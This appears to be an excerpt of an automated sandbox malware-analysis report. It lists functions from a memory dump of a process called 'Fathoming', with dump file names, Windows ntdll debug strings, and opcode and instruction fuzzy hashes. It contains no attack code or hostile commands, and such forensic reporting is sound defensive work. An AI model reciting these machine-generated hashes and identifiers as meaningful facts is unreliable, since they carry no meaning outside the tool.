                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                          • API String ID: 3446177414-1102453626
                                          • Opcode ID: 6d2e75cbda054d93eb74b835b2e6e10fbe73f1df6af464f0af8d76374e1307b0
                                          • Instruction ID: 010927d1b4b0cbad21de9fe7f12ceb083e1cf4ff72901d76e8cf139129bdae40
                                          • Opcode Fuzzy Hash: 6d2e75cbda054d93eb74b835b2e6e10fbe73f1df6af464f0af8d76374e1307b0
                                          • Instruction Fuzzy Hash: 4141893AA00216DFCB0DDF59C598949BBF6FF4A75472681AEE4089B221D731ED42CB90
                                          Function 21BB6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                          • Instruction ID: e37257cadf13211da8bcbe5b4b30ebbdb198e46ca73610b16e8eb57945ecfccc
                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                          • Instruction Fuzzy Hash: CC0208715083419FD709CF28C490A6FBBF5EFD9700F008A6DB9998B664D731EA45CB92
                                          Function 21B2B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: a1e5990add3fab5dcab6fad43a14612a56479b5f77b1a39d59f4cd3376bfa661
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: D081B230A01A498EEF3DCF74C650BEDBBB1EF46350F14461DE858AB2A1CE7489488B51
                                          Function 21AE9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$@
                                          • API String ID: 3446177414-1194432280
                                          • Opcode ID: de5283795bfa94aa35ca1e59e6dbaad9699ea41eb81a3538667fdcba29dbe2a9
                                          • Instruction ID: a7ffda841cb8394b07ceb8efc3f0cf83b5be6633539c99ddb35c0d101fb2f449
                                          • Opcode Fuzzy Hash: de5283795bfa94aa35ca1e59e6dbaad9699ea41eb81a3538667fdcba29dbe2a9
                                          • Instruction Fuzzy Hash: 73810871D012699BDB25CF54CC54BDABAB8BF49750F0041EAEA1DB7290D7309E84DFA0
                                          Function 21B14D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 21B5362F
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 21B5365C
                                          • LdrpFindDllActivationContext, xrefs: 21B53636, 21B53662
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 21B53640, 21B5366C
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-3779518884
                                          • Opcode ID: 418d88cfefb24cd0792943f4bb1dd083b1190a7e07e34b770b15c48278f0921d
                                          • Instruction ID: a49e094c1206cd87bf5686c05cca5f6154ef28956646f7ce89308d5067dc5449
                                          • Opcode Fuzzy Hash: 418d88cfefb24cd0792943f4bb1dd083b1190a7e07e34b770b15c48278f0921d
                                          • Instruction Fuzzy Hash: 8D312732900652AEEF1EDF54C884F1776B8FF03758F87412EE9085727ADBA09D808795
                                          Function 21B920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$[$]:%u
                                          • API String ID: 48624451-2819853543
                                          • Opcode ID: 1cb4cf35c24e7b5834aed4cd607543c0cd861de8ff781f7ad172e06fc35f057b
                                          • Instruction ID: 8f35cdd3e620e26c2555bc23afefcee7939306f9e64389c23697b819d7d3e6db
                                          • Opcode Fuzzy Hash: 1cb4cf35c24e7b5834aed4cd607543c0cd861de8ff781f7ad172e06fc35f057b
                                          • Instruction Fuzzy Hash: 352179BAE001199FDB14DF79DC40AEE7BF8EF59750F040169E905D3201E730DA168B91
                                          Function 21B0F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                          Download Yara Rule
                                          Strings
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 21B502BD
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 21B502E7
                                          • RTL: Re-Waiting, xrefs: 21B5031E
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: a4b943ae3fe98596c9ef727b091bb7e57d99259b0abec833a94d1ae2786556d8
                                          • Instruction ID: fd27c838c266577820dcf66c743477cefc1ce76cc541b33fe71a794d17ed655c
                                          • Opcode Fuzzy Hash: a4b943ae3fe98596c9ef727b091bb7e57d99259b0abec833a94d1ae2786556d8
                                          • Instruction Fuzzy Hash: 22E19B30608782AFD759CF28C884B1ABBF4FB8A354F100A6DF5A48B2E1D775D945CB42
                                          Function 21BB8927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 21BB8B03
                                          • RtlDebugPrintTimes.NTDLL ref: 21BB8B5B
                                            • Part of subcall function 21B22B60: LdrInitializeThunk.NTDLL ref: 21B22B6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes$InitializeThunk
                                          • String ID: $File
                                          • API String ID: 1259822791-2412145507
                                          • Opcode ID: 5cc3be777f23bc3d806427b20ca40d7fa2aaa9350f55a0634726caa30cba1cb8
                                          • Instruction ID: c1b707dc0c74b2600466d854896b6464fd3d56c0c1da040caf6e6b9e4bfd4fec
                                          • Opcode Fuzzy Hash: 5cc3be777f23bc3d806427b20ca40d7fa2aaa9350f55a0634726caa30cba1cb8
                                          • Instruction Fuzzy Hash: 3F617E71A1022DABDF2ACF24CC55BE97BB9AB08710F0441E9EA09E7191DA709F84CF54
                                          Function 21B92300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 0699d9ade62f641ac4404c49f8bb7877aba0bf81f136f1bef6b6038370b5ff76
                                          • Instruction ID: 3b3b7e31ed6f3ba1bf3614dba7c0fa0a222decbacb745bc452160b681441441a
                                          • Opcode Fuzzy Hash: 0699d9ade62f641ac4404c49f8bb7877aba0bf81f136f1bef6b6038370b5ff76
                                          • Instruction Fuzzy Hash: 34318672E005199FDB14CE29DC80BEE7BF8EF55710F4045A9E949E3240EB309A458FA0
                                          Function 21B0EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1714c1a76f50593f3d84c5369e994c8aeea39b0471d7727bc01d5cc33bd1e929
                                          • Instruction ID: 3f2c6ad73010abc23e1801611522cb403f1dcb9a06ad16f5602c34303d05d531
                                          • Opcode Fuzzy Hash: 1714c1a76f50593f3d84c5369e994c8aeea39b0471d7727bc01d5cc33bd1e929
                                          • Instruction Fuzzy Hash: 48E11F70E00608DFDB29CFAAC988A8DBBF5FF49310F20452EE946A7261D771A941CF50
                                          Function 21B5EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: b662f7b660c748cf2c7dcc004c005b4e46505e697a668c47d383a573ec44d4d2
                                          • Instruction ID: e4b425b720b58bb43e900b49b06b86c8f5239fd34dc6a69e1cf58f28d858e7da
                                          • Opcode Fuzzy Hash: b662f7b660c748cf2c7dcc004c005b4e46505e697a668c47d383a573ec44d4d2
                                          • Instruction Fuzzy Hash: C9714471E01219AFDF49CFA5C988ADDBBB5FF49310F14402EEA05EB254D774AA05CBA0
                                          Function 21BBA4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: d5cbeaa2260345afdc86b669fe2551362e69e81f8e524321eb0d84a8a1aea10d
                                          • Instruction ID: 4751f854702a93dcd918485e25cfee2f69eb6f6d617dba96fecc33913159f276
                                          • Opcode Fuzzy Hash: d5cbeaa2260345afdc86b669fe2551362e69e81f8e524321eb0d84a8a1aea10d
                                          • Instruction Fuzzy Hash: 76514975B006129FDB0CCE69C4A5A29B7F5FF8A210B10416DEA06DBB61DB75EF41CB80
                                          Function 21B5F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: eb52754dedfa39effad0f0b01659d2373756dfa463a2a12dfe21f78b1a4c4c45
                                          • Instruction ID: 233cb71bb4199939f4b80f41e7597523600bd723e01fcaf2b3608934191a72c4
                                          • Opcode Fuzzy Hash: eb52754dedfa39effad0f0b01659d2373756dfa463a2a12dfe21f78b1a4c4c45
                                          • Instruction Fuzzy Hash: 6C510EB2E00219AFEF49CF95D888ADDBBB5FF48354F14812EE905AB264D7359A01CB50
                                          Function 21B14C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$Flst
                                          • API String ID: 0-758220159
                                          • Opcode ID: 4509c8b558ce7a145e906067a4404d7f89576b9580b6fd782a141e6a46021fe8
                                          • Instruction ID: 02208740965bd34bcabbac272e318b9ddad90273c114fb207136b80d6594b993
                                          • Opcode Fuzzy Hash: 4509c8b558ce7a145e906067a4404d7f89576b9580b6fd782a141e6a46021fe8
                                          • Instruction Fuzzy Hash: 1A51ABB1E002499FCF1ACF99D48475AFBF4EF46718F56802ED0099B265EB709E85CB80
                                          Function 21B6CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                          Download Yara Rule
                                          APIs
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 21B6CFBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: CallFilterFunc@8
                                          • String ID: @$@4rw@4rw
                                          • API String ID: 4062629308-2979693914
                                          • Opcode ID: 4ee8661e7e6ed2e66db89a9d47fb1b53ea24249da83997a1ff0c52d6e00d4897
                                          • Instruction ID: 8fc843225690ddf75d0bbec074cfbd0345717e377353dbcd22f51c69079b21be
                                          • Opcode Fuzzy Hash: 4ee8661e7e6ed2e66db89a9d47fb1b53ea24249da83997a1ff0c52d6e00d4897
                                          • Instruction Fuzzy Hash: A141D5B2D00259DFCB29CFA5C990A6EBBF8FF69740F00412AE944DB265D735C905CB61